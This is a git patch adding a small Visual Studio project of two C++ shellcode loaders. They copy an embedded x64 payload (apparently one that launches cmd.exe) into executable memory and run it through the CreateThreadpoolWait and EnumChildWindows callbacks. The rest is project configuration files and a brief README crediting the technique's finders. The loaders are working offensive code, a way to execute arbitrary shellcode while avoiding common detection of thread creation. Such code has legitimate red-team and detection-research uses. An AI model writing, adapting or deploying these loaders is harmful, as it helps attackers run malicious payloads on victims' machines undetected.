From 0667c11ac16b7ebc5ad86d02ad3c6517ca2e3c9d Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sat, 27 Feb 2021 19:06:04 -0500 Subject: [PATCH] Add project files. --- AlternativeShellcodeExec.sln | 41 +++++ CreateThreadPoolWait/CreateThreadPoolWait.cpp | 41 +++++ .../CreateThreadPoolWait.vcxproj | 147 ++++++++++++++++++ .../CreateThreadPoolWait.vcxproj.filters | 22 +++ EnumChildWindows/EnumChildWindows.cpp | 48 ++++++ EnumChildWindows/EnumChildWindows.vcxproj | 147 ++++++++++++++++++ .../EnumChildWindows.vcxproj.filters | 22 +++ Readme.md | 5 + 8 files changed, 473 insertions(+) create mode 100644 AlternativeShellcodeExec.sln create mode 100644 CreateThreadPoolWait/CreateThreadPoolWait.cpp create mode 100644 CreateThreadPoolWait/CreateThreadPoolWait.vcxproj create mode 100644 CreateThreadPoolWait/CreateThreadPoolWait.vcxproj.filters create mode 100644 EnumChildWindows/EnumChildWindows.cpp create mode 100644 EnumChildWindows/EnumChildWindows.vcxproj create mode 100644 EnumChildWindows/EnumChildWindows.vcxproj.filters create mode 100644 Readme.md diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln new file mode 100644 index 0000000..be43368 --- /dev/null +++ b/AlternativeShellcodeExec.sln @@ -0,0 +1,41 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30907.101 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumChildWindows", "EnumChildWindows\EnumChildWindows.vcxproj", "{5AFAA3AE-0019-4828-86EB-4B34C489BCDB}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateThreadPoolWait", "CreateThreadPoolWait\CreateThreadPoolWait.vcxproj", "{7C60D205-1563-4BEC-BB27-1D7C3B58A08F}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Debug|x64.ActiveCfg = Debug|x64 + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Debug|x64.Build.0 = Debug|x64 + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Debug|x86.ActiveCfg = Debug|Win32 + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Debug|x86.Build.0 = Debug|Win32 + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Release|x64.ActiveCfg = Release|x64 + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Release|x64.Build.0 = Release|x64 + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Release|x86.ActiveCfg = Release|Win32 + {5AFAA3AE-0019-4828-86EB-4B34C489BCDB}.Release|x86.Build.0 = Release|Win32 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Debug|x64.ActiveCfg = Debug|x64 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Debug|x64.Build.0 = Debug|x64 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Debug|x86.ActiveCfg = Debug|Win32 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Debug|x86.Build.0 = Debug|Win32 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Release|x64.ActiveCfg = Release|x64 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Release|x64.Build.0 = Release|x64 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Release|x86.ActiveCfg = Release|Win32 + {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {A113DEC5-1AB8-4FEC-89D9-E87CB9F8A2C9} + EndGlobalSection +EndGlobal diff --git a/CreateThreadPoolWait/CreateThreadPoolWait.cpp b/CreateThreadPoolWait/CreateThreadPoolWait.cpp new file mode 100644 index 0000000..3e8b095 --- /dev/null +++ b/CreateThreadPoolWait/CreateThreadPoolWait.cpp @@ -0,0 +1,41 @@ +#include +#include + +/* +* Credit goes to alfarom256 for finding this! +*/ + +unsigned char shellcode[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" +"\x2e\x65\x78\x65\x00"; + + +int main() +{ + HANDLE event = ::CreateEvent(NULL, FALSE, TRUE, NULL); + LPVOID shellcodeAddress = ::VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(shellcodeAddress, shellcode, sizeof(shellcode)); + + PTP_WAIT threadPoolWait = ::CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL); + ::SetThreadpoolWait(threadPoolWait, event, NULL); + ::WaitForSingleObject(event, INFINITE); + + return 0; +} \ No newline at end of file diff --git a/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj b/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj new file mode 100644 index 0000000..41f956d --- /dev/null +++ b/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {7c60d205-1563-4bec-bb27-1d7c3b58a08f} + CreateThreadPoolWait + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj.filters b/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj.filters new file mode 100644 index 0000000..1202c1d --- /dev/null +++ b/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/EnumChildWindows/EnumChildWindows.cpp b/EnumChildWindows/EnumChildWindows.cpp new file mode 100644 index 0000000..9d40545 --- /dev/null +++ b/EnumChildWindows/EnumChildWindows.cpp @@ -0,0 +1,48 @@ +#include +#include + + + +int err(const char* errmsg) { + + + printf("Error: %s (%u)\n", errmsg, ::GetLastError()); + return 1; + +} + + +int main() +{ + + char shellcode[] = + "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" + "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" + "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" + "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" + "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" + "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" + "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" + "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" + "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" + "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" + "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" + "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" + "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" + "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" + "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" + "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" + "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" + "\x2e\x65\x78\x65\x00"; + + LPVOID buf = ::VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (!buf) + return err("VirtualAlloc Failure"); + + if (::RtlMoveMemory(buf, shellcode, sizeof(shellcode))) { + + ::EnumChildWindows(NULL, (WNDENUMPROC)buf, NULL); + + } +} \ No newline at end of file diff --git a/EnumChildWindows/EnumChildWindows.vcxproj b/EnumChildWindows/EnumChildWindows.vcxproj new file mode 100644 index 0000000..b1b14f8 --- /dev/null +++ b/EnumChildWindows/EnumChildWindows.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {5afaa3ae-0019-4828-86eb-4b34c489bcdb} + EnumChildWindows + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumChildWindows/EnumChildWindows.vcxproj.filters b/EnumChildWindows/EnumChildWindows.vcxproj.filters new file mode 100644 index 0000000..35a7707 --- /dev/null +++ b/EnumChildWindows/EnumChildWindows.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/Readme.md b/Readme.md new file mode 100644 index 0000000..b4438a6 --- /dev/null +++ b/Readme.md @@ -0,0 +1,5 @@ +# Alternative Code Execution + +Alternative thread execution via Callbacks. + +Shoutout to [alfarom256](https://github.com/alfarom256) and [ch3rn0byl](https://github.com/ch3rn0byl) yall are fam. \ No newline at end of file